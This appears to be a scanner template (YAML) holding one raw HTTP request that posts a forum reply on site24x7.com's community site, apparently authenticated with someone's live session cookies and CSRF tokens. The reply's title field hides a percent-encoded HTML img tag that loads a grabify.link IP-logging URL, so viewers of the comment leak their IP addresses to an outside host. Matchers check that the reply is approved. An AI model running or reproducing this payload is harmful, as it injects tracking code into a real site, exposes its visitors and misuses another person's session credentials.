id: information_disclosure

info:
  name: test
  author: test
  severity: medium
  tags: information-disclosure

requests:
- raw:
  - |-
    POST /community/action?method=postReply HTTP/1.1
    Host: {{Hostname}}
    Cookie: site24x7-_zldp=c0tmAe%2BHc73ujp%2BnYl8kuWT2HJodais5intYtdS2USumed60NmWElp15Az2S6IdkCaUbPUvRWVc%3D; site24x7-_uuid=a3f174d9-7e37-472d-958f-3257732b4317_a87; zps-tgr-dts=sc%3D10-expAppOnNewSession%3D%5B%5D-pc%3D1-sesst%3D1654447438361; 5MmWvdK=1653626605432psf0.022194154813176104; zabHMBucket=a1fc171c7b734b94ac940744db0dfcb4; _iamadt=35223b806d169b63d867e130deedb6b4eff8dfba92a1795fb39ac9f5ea1f641fbebc9434d66042475d1f949475c046583c49d9e98732a801510d9cf8fb24ad5d; _iambdt=e616cdbb36293f7b09aa1c8c3b116791857d2e034dc97cbe067cdce2af0d672ff5e3fc0f646a5a6b4d80f9019e2f452ef3bf1a4ae555cf2a7fe9ee1023033810; zaaid=776234333; zabUserId=1654372487307zabu0.9663631042143889; landingPageUrl=https%3A%2F%2Fwww.site24x7.com%2Fblog%2Fvpn-monitoring-for-remote-working; isiframeenabled=true; site24x7-_zldt=1cdd3308-c52e-416e-9e6a-f85e8a7910a8-2; httpReferrer1=https%3A%2F%2Fwww.site24x7.com%2Flogin%2Fsuccess.jsp%3Furlpath%3D%252Fblog%252Fvpn-monitoring-for-remote-working; site24x7rumID=628119950427882.1654444187803.1654444375174; s247_announcement=1; 78bd76dc99=38aa6cfca8ccb9eb4bacf05a88695062; s247cname=a6ca1021dab0ab230c987da549926d8a6ed2e787a0ca14be71a5ff152b15a96f487d40095b722a4b2960b7e119221e66567b0dfdef68c238fd10baa133088840; JSESSIONID=D15F7C734BEB18FEE210B33E04B6035D; lpage=l; S247_hallowen=yes; _zcsr_tmp=a6ca1021dab0ab230c987da549926d8a6ed2e787a0ca14be71a5ff152b15a96f487d40095b722a4b2960b7e119221e66567b0dfdef68c238fd10baa133088840; 70fdde380e=af820d3c90b6f47b756d7e35bf85683a; 3ed8788753=0b3a8ee63ed7156a8ac98de0680f7e9e; 3309580ed5=67c53cffcd23a6fcd38958fec5c92392; CT_CSRF_TOKEN=a6ca1021dab0ab230c987da549926d8a6ed2e787a0ca14be71a5ff152b15a96f487d40095b722a4b2960b7e119221e66567b0dfdef68c238fd10baa133088840; wms.agent=true; wms-tkp-token=721478646-2e321724-18cf4021540ea9ff2c12616fcbde3143; sb-may-2022=1; httpReferrer2=https%3A%2F%2Fwww.site24x7.com%2Fwebsite-monitoring-alert.html; zscb3a69cd9f9c2421a87324fe4fad465ea=1654447438361zsc0.9270051695764381; zft-sdc=isef%3Dtrue-isfr%3Dtrue-src%3DZcampaigns; utm_source=Zcampaigns; utm_medium=nlmail-news; utm_term=may2020; utm_campaign=ME-Newsletter-COMMON
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: */*
    Accept-Language: en
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 461
    Origin: https://www.site24x7.com
    Referer: https://www.site24x7.com/blog/vpn-monitoring-for-remote-working?utm_source=Zcampaigns&utm_medium=nlmail-news&utm_campaign=ME-Newsletter-COMMON&utm_term=may2020
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close

    comment-title=Re%3A+Monitor+VPNs%E2%80%94The+secure+gateway+to+your+networks+%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%67%72%61%62%69%66%79%2e%6c%69%6e%6b%2f%74%72%61%63%6b%2f%34%51%5a%32%5a%4b%2f%3e&comment-content=%3Cp%3Etesting%3C%2Fp%3E&comment-topicid=18151000001647073&comment-responseid=-1&s247pname=a6ca1021dab0ab230c987da549926d8a6ed2e787a0ca14be71a5ff152b15a96f487d40095b722a4b2960b7e119221e66567b0dfdef68c238fd10baa133088840&languageCode=en

  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - approved
  - type: status
    status:
    - 200

